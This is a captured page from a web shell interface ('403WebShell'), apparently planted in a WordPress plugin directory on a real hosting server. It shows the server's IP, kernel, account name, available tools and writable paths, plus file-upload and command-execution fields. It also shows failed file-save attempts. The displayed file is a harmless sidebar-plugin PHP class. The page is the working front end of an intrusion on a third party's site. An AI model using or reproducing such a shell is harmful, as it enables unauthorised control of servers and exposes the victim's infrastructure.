Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.146.255.135
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/blog.diixadigital.com/wp-content/plugins/rubik-sidebar-generator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/blog.diixadigital.com/wp-content/plugins/rubik-sidebar-generator/condition-cpt.php
<?php
class Smk_Sidebar_Generator_Condition_Cpt extends Smk_Sidebar_Generator_Condition{
	public $type = 'post_type';

	public function __construct(){
		$this->name = __('Post types', 'smk_sbg');
	}

	// key => value
	public function prepareMainData(){
		$pt_args = array(
			'public'   => true,
			'_builtin' => false
		);
		$pt = array(
			'post' => _x('Posts', 'Post type name', 'smk_sbg'),
			'page' => _x('Pages', 'Post type name', 'smk_sbg'),
		);
		$post_types = get_post_types( $pt_args, 'objects' );
		if( !empty($post_types) ){
			foreach ($post_types as $post_type) {
				$pt[ $post_type->name ] = $post_type->label;
			}
		}
		return $pt;
	}

	// key => value
	public function prepareSecondaryData( $main_value ){
		$the_type  = $this->selected( $main_value );
		$all_posts = array();

		if( 'post' == $the_type ){
			$all_posts['all_single'] = ' - '. __('All single', 'smk_sbg') .' - ';
		}
		elseif( 'page' == $the_type ){
			$all_posts['all_pages'] = ' - '. __('All pages', 'smk_sbg') .' - ';
		}
		else{
			$all_posts['all_archives_single'] = ' - '. __('Any(archives or single)', 'smk_sbg') .' - ';
			$all_posts['all_single'] = ' - '. __('All single', 'smk_sbg') .' - ';
		}

		if( !empty($the_type) ){
			$posts = get_posts(array(
				'post_type'        => $the_type,
				'post_status'      => 'publish',
				'posts_per_page'   => -1,
			));

			foreach ( $posts as $post ) {
				setup_postdata( $post );
				$id = $post->ID;
				$all_posts[ $id ] = $post->post_title;
			}
			// wp_reset_postdata();
		}
		return $all_posts;
	}

	/**
	 * Check if can be replaced
	 *
	 * Check if the current condition settings meets the criteria and can replace a sidebar. Rturn true if is allowed to replace the sidebar.
	 *
	 * @param string $first_selection The first selection is the second string from the explode type::this_selection. "this_selection" is the post type
	 * @param array $second_selection = equalto !!! IT is an ARRAY or empty array.
	 * @return bool True if can replace
	 */
	public function canReplace( $first_selection, $second_selection ){
		$can = false;
		
		// BLOG. "post"
		if( 'post' == $first_selection ){
			if( empty($second_selection) ){
				if( is_home() || is_archive() || is_singular( 'post' ) ){
					$can = true;
				}
			}
			else{
				if( in_array('all_single', (array) $second_selection) && is_singular( 'post' ) ){
					$can = true;
				}
				elseif( is_single( $second_selection ) ){
					$can = true;
				}
			}
		}

		// PAGES. "page"
		elseif( 'page' == $first_selection ){
			if( ( empty($second_selection) || in_array('all_pages', (array) $second_selection) ) && is_page() ){
				$can = true;
			}
			elseif( is_page( $second_selection ) ){
				$can = true;
			}
		}

		// Custom Post Type
		else{
			if( empty($second_selection) ){
				if( is_singular( $first_selection ) || is_post_type_archive( $first_selection )  ){
					$can = true;
				}
			}
			elseif( 'all_archives_single' && ( is_singular( $first_selection ) || is_post_type_archive( $first_selection ) ) ){
				$can = true;
			}
			elseif( 'all_archives' && is_post_type_archive( $first_selection ) ){
				$can = true;
			}
			elseif( is_single( $second_selection ) ){
				$can = true;
			}
		}

		return $can;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit